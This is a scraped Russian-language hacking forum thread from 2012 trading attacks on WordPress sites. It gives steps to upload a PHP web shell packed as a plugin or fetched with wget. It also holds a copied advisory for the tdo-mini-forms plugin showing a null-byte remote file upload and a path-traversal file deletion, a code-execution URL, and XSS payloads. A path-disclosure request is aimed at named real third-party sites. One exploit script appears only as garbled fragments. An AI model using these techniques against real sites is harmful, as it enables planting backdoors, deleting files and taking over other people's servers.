ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

08.11.2012, 01:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 193811
Репутация:
724
|
|
Сообщение от qaz
qaz said:
а можно хоть прмер или где про ето почитать?
Пакуем шелл в зип.
Например rss_class.php => rss_class.zip
Добавляем плагин, выбираем наш архив.
Готово.
/wp-content/plugins/rss_class/
|
|
|
|

08.11.2012, 08:55
|
|
Guest
Сообщений: n/a
Провел на форуме: 178623
Репутация:
94
|
|
Сообщение от z0mbyak
z0mbyak said:
Скачай любой плагин для вп и закинь в архив свой шелл...
Через редактирование шаблонов измени шаб и залейся через wget например...
Через шаблоны не всегда удается залится, ибо могут быть урезаны права на запись.
|
|
|
|

22.11.2012, 02:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
Wordpress Plugin tdo-mini-forms (rfu/rfd) Vulnerabilities
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]wordpress tdo[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]mini[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]forms plugin[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rfu[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]rfd[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]Vulnerabilities
[/COLOR][COLOR="#007700"]------------------------------------------------------------
[/COLOR][COLOR="#0000BB"]wordpress tdo[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]mini[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]forms plugin[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]remote file upload[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]remote file deletion[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]Vulnerabilities
Auther[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Cold z3ro[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]hackteach[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]org[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]s3curi7y[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com
Anonymous[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]You are the man
[/COLOR][COLOR="#FF8000"]# Remote file upload :
[/COLOR][COLOR="#0000BB"]wordpress[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]plugins[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdo[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]mini[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]forms[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]upload[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]inline[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]tdomf_form_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"]=
[/COLOR][COLOR="#0000BB"]file extension[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"];.[/COLOR][COLOR="#0000BB"]jpg
uploaded path[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]wordpress[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]uploads[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]$tdomf_form_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"])/[/COLOR][COLOR="#0000BB"]$user_agent[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]IP[/COLOR][COLOR="#007700"])/[/COLOR][COLOR="#0000BB"]$filename[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PHP[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"];.[/COLOR][COLOR="#0000BB"]jpg
Example to uploaded path[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]wordpress[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]uploads[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]127.0.0.1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]z3ro[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PHP[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"];.[/COLOR][COLOR="#0000BB"]jpg
[/COLOR][COLOR="#FF8000"]# Remote file Deletion
[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]Note[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]useing Any http POST header modifier[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#0000BB"]tdomf_form_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]deletefile[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]filepath[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$varibale[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]uploads[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]127.0.0.1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]z3ro[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PHP[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"];.[/COLOR][COLOR="#0000BB"]jpg[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]NULL
Example to result[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]plugins[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdo[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]mini[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]forms[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]upload[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]inline[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]tdomf_form_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]deletefile[/COLOR][COLOR="#007700"][]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]filepath[/COLOR][COLOR="#007700"]=../../../[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]uploads[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]127.0.0.1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]z3ro[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PHP[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"];.[/COLOR][COLOR="#0000BB"]jpg[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"]=
[/COLOR][COLOR="#0000BB"]Eof[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]# 1337day.com/exploit/19776 [2012-11-21]
[/COLOR][/COLOR]
Кто нибудь скажет как заставить этот плагин залить мой файл в формате .php?
|
|
|
|

05.12.2012, 01:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 12174
Репутация:
7
|
|
Нашел уязвимость в плагине wp, может кому-то будет полезная.
Wordpress "count-per-day v3.2.4" plugin PHP Code Execution
В админке в настройках плагина параметр "Последние счетчики - Дни:"
Результат:
Код:
Code:
/wp-content/plugins/count-per-day/ajax.php?f=count&time=9999999999
|
|
|
|

10.12.2012, 21:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 178623
Репутация:
94
|
|
WordPress SEO Plugin 1.3.11 Cross Site Script Vulnerability
[+] WordPress SEO Plugin 1.3.11 Cross Site Script XSS
[+] Found by Angel Injection
[+] Version: 1.3.11
Exploit:
Код:
Code:
http://localhost/?s=[xss here]&x=0&y=0
http://localhost/?s=">alert(1)&x=0&y=0
|
|
|
|

17.12.2012, 20:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 178623
Репутация:
94
|
|
Wordpress 3.5 Active XSS
Нужны права администратора.
Идем в комментарии к записи, и в комментариях вставляем JS код, к примеру:
Код:
Code:
">alert('XSS Test')
Проверить можно тут.
Код:
Code:
L: test
P: test
(c) MaxFast aka n3m1s
|
|
|
|

17.12.2012, 20:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 193811
Репутация:
724
|
|
MaxFast, бага отработала под акком админа, под гостем идет экранирование.
|
|
|
|

18.12.2012, 17:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 178623
Репутация:
94
|
|
Wordpress 3.5 Full Path Disclosure
Exploit:
Код:
Code:
localhost/?cat[]=1
Result:
Код:
Code:
Warning: urldecode() expects parameter 1 to be string, array given in *path* on line 1735
Example:
Код:
Code:
_tpp://sergeybiryukov.ru/?cat[]=1
_ttp://wpsymposium.com/?cat[]=1
Found by MaxFast aka n3m1s
|
|
|
|

20.12.2012, 01:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 28262
Репутация:
23
|
|
[B]Wordpress Error - I can not get the source code for your site."[/COLOR]);
}
preg_match_all("| array given in (.*?)wp-includes|i",$source,$m);
foreach($m[1] as$match) {
echo"".$match."";
}
}
?>
Wordpress 3.5 Full Path Disclosure Exploit | By n3m1s and zed0x
body { background-color: #111; color: #FFF; font-family: Verdana; font-size: 16px; }
input { background-color: #222; color: #FFF; font-family: Verdana; font-size: 16px; padding: 5px; border: 0px; }
.error { margin-top: 25px; color: red; font-family: Verdana; font-size: 14px; background-color: #222; padding: 10px; text-align: center; }
.result { margin-top: 25px; color: green; font-family: Verdana; font-size: 14px; background-color: #222; padding: 10px; text-align: center; }
Target:
URL not valid");
getCat($URL);
}
?>
[/COLOR]
[/PHP]
NOTICE: this exploit for web, do not forget about copyright!
|
|
|
|

20.12.2012, 07:36
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Ребят, я всё понимаю "активность" и всё такое, но я не вижу смысла в эксплойте из одной строчки, максимум что делающего - раскрывающего пути. Да ещё только 1 метод представлен. Бред.
У меня к Вам предложение - впихините в код все известные методы раскрытия пути на WordPress - получите и от меня +, и от других форумчан спасибо.
В противном случае придётся удалить топик за ненадобностью. Согласитесь - кому захочется качать php exploit, копировать на тачку, запускать, когда просто можно сделать 1 простое дейсвтие в адресной строке даже по памяти ??
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|